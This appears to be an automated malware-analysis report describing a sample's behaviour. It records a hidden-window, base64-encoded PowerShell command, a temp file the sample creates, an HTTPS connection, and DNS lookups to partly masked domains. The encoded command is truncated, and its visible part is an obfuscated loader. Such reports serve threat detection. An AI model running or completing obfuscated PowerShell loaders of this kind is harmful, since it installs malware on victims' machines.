Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYQBpAGwAYgBxAD0AKAAoACcAQgAnACsAJwBoADYAJwApACsAKAAnAGQAeQAnACsAJwA5ACcAKQArACcAYQAnACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHQARQBNAFAAXAB3AG8AUgBkAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1960
Modifies file system
Creates the following files
- %TEMP%\1009030.cvr
Network activity
Connects to
- 'gn##ur.com':443
TCP
Other
- 'gn##ur.com':443
UDP
- DNS ASK al###zsons.com
- DNS ASK le#####nesboldogan.com
- DNS ASK me####4newss.com
- DNS ASK 7a####lfallah.com
- DNS ASK gn##ur.com
- DNS ASK ma#####ta.lequss.com
- DNS ASK ad#####eboutique.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYQBpAGwAYgBxAD0AKAAoACcAQgAnACsAJwBoADYAJwApACsAKAAnAGQAeQAnACsAJwA5ACcAKQArACcAYQAnACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHQARQBNAFAAXAB3AG8AUgBkAF...' (with hidden window)
